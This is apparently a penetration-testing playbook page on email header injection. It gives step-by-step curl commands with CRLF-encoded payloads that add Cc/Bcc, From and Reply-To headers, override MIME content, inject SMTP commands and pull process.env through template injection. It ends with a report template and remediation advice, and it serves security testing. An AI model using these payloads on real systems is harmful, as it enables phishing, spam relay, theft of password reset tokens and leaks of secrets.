testing-for-email-header-injection | cybersecurity-skills

Stats

Actions

Tags

testing-for-email-header-injection | cybersecurity-skills

Testing for Email Header Injection

When to Use

When testing contact forms, feedback forms, or "email a friend" functionality
During assessment of password reset email functionality
When testing newsletter subscription or notification email systems
During penetration testing of applications that send emails based on user input
When auditing email-related API endpoints for header injection

Prerequisites

Burp Suite for intercepting and modifying HTTP requests
Understanding of SMTP protocol and email header structure
Knowledge of CRLF injection techniques (\r\n sequences)
Test email accounts for receiving injected emails
Access to application features that trigger email sending
SMTP server logs access for monitoring injection attempts

Workflow

Step 1 — Identify Email Injection Points

# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields

# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms

# Test basic functionality first
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]&subject=Hello&message=Test message"

Step 2 — Test for CRLF Header Injection

# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]%0ACc:[email protected]&message=Test"

# Inject BCC header
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]%0ABcc:[email protected]&message=Test"

# Inject via the name field
curl -X POST http://target.com/contact \
  -d "name=Test%0ACc:[email protected]&[email protected]&message=Test"

# Inject via subject field
curl -X POST http://target.com/contact \
  -d "name=Test&[email protected]&subject=Hello%0ABcc:[email protected]&message=Test"

# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
  -d "[email protected]%0D%0ACc:[email protected]"

# %0A (LF only)
curl -X POST http://target.com/contact \
  -d "[email protected]%0ACc:[email protected]"

# %0D (CR only)
curl -X POST http://target.com/contact \
  -d "[email protected]%0DCc:[email protected]"

# Double encoding
curl -X POST http://target.com/contact \
  -d "[email protected]%250ACc:[email protected]"

Step 3 — Inject Custom Email Content

# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
  -d "[email protected]%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"

# Inject additional MIME parts
curl -X POST http://target.com/contact \
  -d "[email protected]%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"

# Override From header for email spoofing
curl -X POST http://target.com/contact \
  -d "[email protected]%0AFrom:[email protected]"

# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
  -d "[email protected]%0AReply-To:[email protected]"

Step 4 — Test IMAP/SMTP Injection

# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
  -d "query=test%0AEXAMINE INBOX"

# SMTP command injection
curl -X POST http://target.com/api/send \
  -d "[email protected]%0ARCPT TO:[email protected]"

# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
  -d "[email protected]%0AVRFY admin"

# Test SMTP relay abuse
curl -X POST http://target.com/contact \
  -d "[email protected]%0ATo:[email protected]%0ATo:[email protected]%0ATo:[email protected]"

Step 5 — Test JSON-Based Email APIs

# JSON API header injection
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"[email protected]\nCc:[email protected]","subject":"Test","body":"Test"}'

# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":["[email protected]","[email protected]"],"subject":"Test","body":"Test"}'

# Template injection in email body
curl -X POST http://target.com/api/send-email \
  -H "Content-Type: application/json" \
  -d '{"to":"[email protected]","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'

Step 6 — Validate Findings

# Check if injected CC/BCC emails were received
# Monitor [email protected] inbox for received copies

# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers

# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC

# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)

Key Concepts

Concept	Description
CRLF Injection	Injecting carriage return and line feed characters to create new email headers
Header Injection	Adding unauthorized headers (Cc, Bcc, From) to outgoing emails
Spam Relay	Abusing email functionality to send spam to arbitrary recipients
Email Spoofing	Modifying From or Reply-To headers to impersonate trusted senders
MIME Manipulation	Injecting MIME boundaries to override email body content
SMTP Command Injection	Injecting raw SMTP commands through unsanitized email parameters
Newline Characters	\r\n (CRLF), \n (LF), \r (CR) used to separate email headers

Tools & Systems

Tool	Purpose
Burp Suite	HTTP proxy for modifying email-related form submissions
swaks	Swiss Army Knife for SMTP testing and header injection validation
OWASP ZAP	Automated scanner with email injection detection
mailhog	Local SMTP testing server for capturing injected emails
smtp4dev	Development SMTP server for monitoring email injection results
Nuclei	Template scanner with email header injection detection templates

Common Scenarios

Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
Password Reset Hijack — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
Email Content Override — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application

Output Format

## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)

### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | [email protected]%0ACc:[email protected] | CC header injected | High |
| 2 | email | [email protected]%0ABcc:[email protected] | BCC header injected | High |
| 3 | name | Test%0AFrom:[email protected] | From spoofing | Medium |

### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality